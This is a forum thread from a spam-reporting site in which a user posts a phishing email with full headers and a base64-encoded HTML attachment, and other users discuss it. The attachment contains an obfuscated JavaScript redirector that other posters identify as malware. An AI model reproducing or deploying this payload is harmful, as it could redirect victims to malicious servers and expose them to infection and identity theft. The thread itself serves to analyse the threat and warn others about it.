Sign in to follow this  
Followers 0
mplungjan@spamcop.net

Phishing attempts to my spamcop account

5 posts in this topic

Delivered-To: <myemail>

Received: (qmail 4960 invoked from network); 17 Sep 2010 10:58:28 -0000

Received: from unknown (HELO m1pismtp01-018.prod.mesa1.secureserver.net) ([10.8.12.18])

(envelope-sender <ox[at]rootsproduce.com>)

by smtp31.prod.mesa1.secureserver.net (qmail-1.03) with SMTP

for <myemail>; 17 Sep 2010 10:58:28 -0000

X-IronPort-Anti-spam-Result: AtERAFvmkkzYmsMxf2dsb2JhbAAKBJQihW2HdxUBAQoKDBgEHowGhwKtf4VBBIRGiH0

Received: from c60.cesmail.net ([216.154.195.49])

by m1pismtp01-018.prod.mesa1.secureserver.net with ESMTP; 17 Sep 2010 03:58:27 -0700

Received: from unknown (HELO filter8.cesmail.net) ([192.168.1.218])

by c60.cesmail.net with SMTP; 17 Sep 2010 06:58:27 -0400

Received: (qmail 17745 invoked by uid 1010); 17 Sep 2010 10:58:27 -0000

Delivered-To: spamcop-net-<myname>[at]spamcop.net

Received: (qmail 17681 invoked from network); 17 Sep 2010 10:58:26 -0000

X-spam-Checker-Version: SpamAssassin 3.2.4 (2008-01-01) on filter8

X-spam-Level:

X-spam-Status: hits=0.1 tests=HTML_MESSAGE,RDNS_NONE version=3.2.4

Received: from unknown (192.168.1.107)

by filter8.cesmail.net with QMQP; 17 Sep 2010 10:58:26 -0000

Received: from unknown (HELO YBTBJES) (92.246.206.203)

by mx70.cesmail.net with SMTP; 17 Sep 2010 10:58:25 -0000

Received: from svtmail07.prod.sabre.com (svtmail04.prod.sabre.com [151.193.64.1])

by mail.global.frontbridge.com with esmtp

id 5A849F-000946-63

for ljl[at]spamcop.net; Fri, 17 Sep 2010 14:58:19 +0300

Received: from samlab (10.208.04.9:61117) by svtmail09.prod.sabre.com (LSMTP for Windows NT v1.1b) with SMTP id <3.C0CBAD1D[at]svtmail05.prod.sabre.com>; Fri, 17 Sep 2010 14:58:19 +0300

Date: Fri, 17 Sep 2010 14:58:19 +0300

From: "Winfred Joiner" <ox[at]rootsproduce.com>

To: ljl[at]spamcop.net

Message-ID: <57114311.39684104853195612400.JavaMail.ita[at]samlab>

Subject: Please help me

MIME-Version: 1.0

Content-Type: multipart/mixed;

boundary="----=_Part_1695044_17099105.4893020990891"

X-SpamCop-Checked: 92.246.206.203 151.193.64.1

------=_Part_1695044_17099105.4893020990891

Content-Type: text/plain; charset=iso-8859-1

Content-Transfer-Encoding: 7bit

Please help me to take over the accounting duties during the period Jackie will be gone. Make arrangements so that you will be able to issue checks and know where to deposit received checks.

------=_Part_1695044_17099105.4893020990891

Content-Type: text/html; name="52399xls.html"

Content-Transfer-Encoding: base64

Content-Disposition: attachment; filename="52399xls.html"

PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCIgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij5mdW5j

dGlvbiBldGdyKHpqNHIpe3Zhcg0KYm85Nyxidmd5PSIiLGtwbjgsaXl2Mj0iMG9jZGZ1bTtpcC9x

cmx4PW50Li06diBoZT5zXCJhPCIscDNqZSxqNDQ2PWl5djIubGVuZ3RoO2V2YWwodW5lc2NhcGUo

IiU2NnVuJTYzdGklNkZuIHIlNjFpeSUyOGt1JTc5Yyl7JTYydmclNzkrPSU2QnV5YyU3RCIpKTtm

b3IocDNqZT0wO3AzamU8emo0ci5sZW5ndGg7cDNqZSsrKXtibzk3PXpqNHIuY2hhckF0KHAzamUp

O2twbjg9aXl2Mi5pbmRleE9mKGJvOTcpO2lmKGtwbjg+LTEpe2twbjgtPShwM2plKzEpJWo0NDY7

aWYoa3BuODwwKXtrcG44Kz1qNDQ2O31yYWl5KGl5djIuY2hhckF0KGtwbjgpKTt9ZWxzZXtyYWl5

KGJvOTcpO319ZXZhbCh1bmVzY2FwZSgiJTY0b2MlNzVtZSU2RXQudyU3Mml0JTY1KGIlNzZneSkl

M0JidiU2N3k9JTIyJTIyOyIpKTt9ZXRncigiMGlcInZkYTA+cy0wbWUtaDtjPW94PmZ0Oi5oLTAw

bi5zLXY6ZDs9eCBlXCJtb2M+O2E8bXNhdG1zb2w8Lml0dXFjaGlpeC1lPHUwOmFscGF4ciIpOzwv

c2NyaXB0Pjxub3NjcmlwdD5UbyBkaXNwbGF5IHRoaXMgcGFnZSB5b3UgbmVlZCBhIGJyb3dzZXIg

dGhhdCBzdXBwb3J0cyBKYXZhU2NyaXB0Ljwvbm9zY3JpcHQ+

------=_Part_1695044_17099105.4893020990891--

Share this post


Link to post
Share on other sites

Thanks mplungjan. Any idea what that bit of JavaÐ…cript (the HTML attachment) you were sent does?

Can you refer to these things by way of a Tracking URL rather than as a paste-in of the actual spam? The forum formatting and badword filter changes stuff posted here, there can sometimes be live links to bad places and, although munged slightly, there is exposure of (usually) innocent addresses etc. when you post the spam in public.

Share this post


Link to post
Share on other sites

Well, I'm not a coder's bootlace (the more refined way to say it, if the phrase seems unfamiliar) but ...

From several different code fragments in the (decoded) attachment it seems to be (slightly?) related to jsunpack - probably an unpacker for a lightning download then - though no source for the download is apparent to me. Lots of people might get "caught" by such a thing (if they have scripting allowed on their browser/mail client) if there is an actual payload and whatever that ultimate payload's function(s) might be would be anyone's guess - but identity theft is potentially the most serious.

Nasty - or not sent by anyone wishing you well anyway.

Share this post


Link to post
Share on other sites
FYI for whatever it's worth

I've been getting similar stuff, seems to be increasing every day.

Well worth raising SL, seems it was and is a 'zero day' sort of thing. Zero detections from the massed AV engines at VirusTotal when the O/P first raised the topic but now my resident Norton says Trojan.Webkit!html - http://securityresponse.symantec.com/secur...-99&tabid=2
Discovered: October 9, 2007

Updated: October 9, 2007 4:42:01 PM

Type: Trojan

Infection Length: Varies

Systems Affected: Windows 98, Windows 95, Windows XP, Solaris, Windows Me, Windows Vista, Windows NT, Windows Server 2003, Linux, Windows 2000

Trojan.Webkit!html is a generic detection for HTML files containing malicious code to redirect users to malicious Web servers.

A successful compromise by a malicious Web server may result in additional malicious files being downloaded to the compromised computer

Seems the 'unescape' coding within the scri_pt may be variable and/or some random characters outside the active body of code may be variable - which successfully defeats initial detection - the O/P's version was not picked up by Norton until yesterday's/today's updates. Haven't specifically checked yours but that's what I think is happening - the hash values will be variable, the code content may appear variable until unescape codes resolved, the redirection destination (which is well obfuscated, I can't see it) may be variable, very likely each day's version of the thing will be undetectable as a threat to most scanners for some days after release.

HTML attachments/content in spam have been around for ages - the prudent assumption is, if they are in spam they probably *are* malicious but this is the first time I have personally verified an instance. Well, apart from a few web bugs (can't assume they are history either - to keep a step ahead, spammers sometimes step backwards). The 'inconvenience' of safe practice (no scripting allowed, no preview of email, view text only, don't read obvious spam at all, don't open unknown attachments or click on unknown links, query/prevent redirections) seems to be vindicated once again.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now
Sign in to follow this  
Followers 0